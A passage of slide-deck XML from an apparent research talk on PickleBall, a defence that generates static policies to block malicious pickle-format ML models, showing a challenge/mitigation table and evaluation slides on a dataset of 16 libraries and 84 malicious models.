              <a:t>Challenge:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Python is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>dynamic language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but policies are generated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="862" name="Google Shape;862;p71"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419100" y="1875075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2723550"/>
                <a:gridCol w="3931925"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Issue</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Mitigation</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Incomplete path analysis of the model creating program → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>incomplete policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall is robust to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> but </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>unused</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> callables through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>lazy enforcement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Over-approximate type recovery → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>loose policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>separates</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>allowed imports</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> from </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en"/>
                      </a:br>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>allowed invocations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Google Shape;863;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200925" y="2284625"/>
            <a:ext cx="1542900" cy="869700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Leverages pattern in ML models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Google Shape;864;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200925" y="3403950"/>
            <a:ext cx="1795800" cy="999600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Inspired by analysis of insecure pickle implementations.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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68" name="Shape 868"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: A Rigorous Dataset</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870;p72"/>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4" name="Shape 874"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="875" name="Google Shape;875;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: A Rigorous Dataset</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Google Shape;876;p73"/>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877" name="Google Shape;877;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="1183850"/>
            <a:ext cx="6198000" cy="1081800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>16 ML Libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>that load pickle models.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent the at-risk APIs that are compromised by malicious pickle models and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>need to be protected with policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="878" name="Google Shape;878;p73" title="pngwing.com.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858000" y="1361488"/>
            <a:ext cx="726525" cy="726525"/>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82" name="Shape 882"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883" name="Google Shape;883;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: A Rigorous Dataset</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="884" name="Google Shape;884;p74"/>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885" name="Google Shape;885;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="1183850"/>
            <a:ext cx="6198000" cy="1081800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>16 ML Libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>that load pickle models.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent the at-risk APIs that are compromised by malicious pickle models and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>need to be protected with policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Google Shape;886;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011925" y="2503050"/>
            <a:ext cx="6198000" cy="937500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>84 malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>models and pickle programs.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Represent all known techniques used by malicious pickle models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="887" name="Google Shape;887;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991325" y="2463397"/>
            <a:ext cx="405000" cy="389700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="58875" lIns="58875" spcFirstLastPara="1" rIns="58875" wrap="square" tIns="58875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="901"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="888" name="Google Shape;888;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="991325" y="2463389"/>
            <a:ext cx="404978" cy="389345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="Google Shape;889;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174027" y="2782481"/>
            <a:ext cx="697722" cy="697722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p74" title="pngwing.com.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858000" y="1361488"/>
            <a:ext cx="726525" cy="726525"/>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94" name="Shape 894"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="Google Shape;895;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: A Rigorous Dataset</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
